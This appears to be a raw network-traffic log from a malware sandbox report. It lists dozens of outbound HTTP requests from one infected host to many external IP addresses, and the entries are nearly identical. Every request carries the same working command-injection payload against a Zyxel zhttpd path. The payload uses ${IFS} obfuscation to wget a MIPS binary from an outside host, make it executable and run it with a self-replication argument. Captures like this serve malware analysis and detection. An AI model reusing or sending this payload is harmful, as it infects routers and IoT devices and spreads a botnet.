                                      Jan 19, 2024 17:29:35.843787909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5305192.168.2.144894684.186.30.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.843838930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5306192.168.2.1456446104.230.71.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.843883038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5307192.168.2.1437388210.133.77.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.843924046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5308192.168.2.145666024.203.139.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.843946934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5309192.168.2.1438062155.106.249.188443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.843978882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5310192.168.2.1436364154.214.16.255443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.844011068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5311192.168.2.145070065.48.177.18443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.844082117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5312192.168.2.1450512180.53.213.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.844130039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5313192.168.2.143673472.224.147.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.844151020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5314192.168.2.146096058.55.241.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.844197035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5315192.168.2.1442864166.62.76.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.844247103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5316192.168.2.1451826133.46.242.199443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.844299078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5317192.168.2.143549459.20.136.233443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.844331980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5318192.168.2.143748288.189.252.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.844357014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5319192.168.2.1456664154.191.94.17443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.844429970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5320192.168.2.1458402207.100.55.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.844464064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5321192.168.2.1446494162.109.51.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.844501019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5322192.168.2.1460204175.196.248.246443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.844537020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5323192.168.2.1442296109.53.180.207443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.844568014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5324192.168.2.144287825.215.195.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.844595909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5325192.168.2.145744078.215.249.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.844700098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5326192.168.2.1454344106.21.211.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.844718933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5327192.168.2.1453502211.18.15.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.844777107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5328192.168.2.144080241.38.131.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.844800949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5329192.168.2.145703431.233.166.221443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.844858885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5330192.168.2.1443118222.230.203.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.844919920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5331192.168.2.144593024.189.246.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.844954967 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5332192.168.2.1441644105.251.178.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.844981909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5333192.168.2.1436260129.91.63.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.845033884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5334192.168.2.1453090147.16.54.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.845072031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5335192.168.2.144007068.230.23.61443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.845102072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5336192.168.2.1436202186.207.3.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.845133066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5337192.168.2.1453878205.249.211.223443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.845177889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5338192.168.2.145856897.68.168.209443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:35.848685026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5339192.168.2.1434406135.203.14.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.856550932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5340192.168.2.145120823.172.158.21443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.856579065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5341192.168.2.1456846133.42.100.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.856667042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5342192.168.2.1451870171.8.161.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.856704950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5343192.168.2.1460164110.12.71.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.856766939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5344192.168.2.1433514203.118.87.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.856806040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5345192.168.2.1449546177.253.249.250443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.856846094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5346192.168.2.144708425.43.75.228443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.856909990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5347192.168.2.143877244.89.125.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.856935024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5348192.168.2.1433556200.254.104.99443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.856976032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5349192.168.2.1457136178.22.179.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.857026100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5350192.168.2.1446148156.112.98.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.857055902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5351192.168.2.144992681.136.40.105443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.857095003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5352192.168.2.1448542156.216.218.194443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.857158899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5353192.168.2.1433948141.70.19.158443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.857187986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5354192.168.2.1455312175.186.126.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.857239008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5355192.168.2.144722678.212.248.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.857278109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5356192.168.2.1448646223.126.112.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.857333899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5357192.168.2.1448362125.144.213.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.857383013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5358192.168.2.1442920196.255.80.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.857408047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5359192.168.2.145352066.120.178.66443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.857453108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5360192.168.2.143976236.27.114.56443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.857496023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5361192.168.2.1453886172.232.65.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.857537031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5362192.168.2.144019431.131.249.206443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.857578039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5363192.168.2.14427628.62.137.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.857614040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5364192.168.2.14385184.2.117.35443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.857640982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5365192.168.2.145944078.12.246.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.857688904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5366192.168.2.1452094158.253.181.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.857734919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5367192.168.2.144279689.144.146.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:36.857779980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      5368192.168.2.1449358208.75.176.255443
                                      TimestampBytes transferredDirectionData
